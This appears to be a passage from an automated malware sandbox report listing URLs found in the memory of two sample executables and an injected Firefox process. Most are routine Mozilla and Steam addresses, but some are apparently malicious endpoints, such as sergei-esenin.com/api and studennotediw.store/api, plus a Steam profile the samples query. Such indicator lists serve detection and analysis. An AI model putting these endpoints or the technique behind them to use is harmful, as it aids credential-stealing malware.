Source: file.exe, 00000000.00000003.2203575439.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212746208.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240943343.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2212628470.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283776593.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203712607.0000000000D83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apip
Source: 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiyU
Source: 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/g
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/j&
Source: 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/o
Source: file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283865897.0000000000D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/om/
Source: file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283865897.0000000000D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/yp
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A0A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.00000255093D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svgresource://gre/mod
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.00000255093D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3140692267.000002551043A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Prompt
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3094563100.000002550923D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3140692267.000002551043A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507CD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3090601585.0000025508DF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3142094936.0000025510AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.00000255074B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userShow
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3114655458.000002550A388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3114655458.000002550A388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2982586081.000002550A0B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.ak
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/MH;
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F
Source: file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186250006.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186229688.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184520949.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184690433.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282756998.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168617103.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184807186.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184381596.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203677272.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140178683.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000003.2126725116.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900CH;
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900M
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/wor
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 09d417a7c4.exe, 00000010.00000003.2912331391.000000000101E000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba2
Source: 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/le
Source: file.exe, file.exe, 00000000.00000003.2167800399.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186250006.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2240990821.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186229688.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184520949.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184690433.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184075512.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282756998.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168617103.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184807186.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2184381596.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2203677272.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140178683.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/apiryptPrimitives.dllC
Source: firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001B.00000002.3134271614.000002550E9D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001B.00000002.3112335102.0000025509C23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helppromiseLangPacksUpda
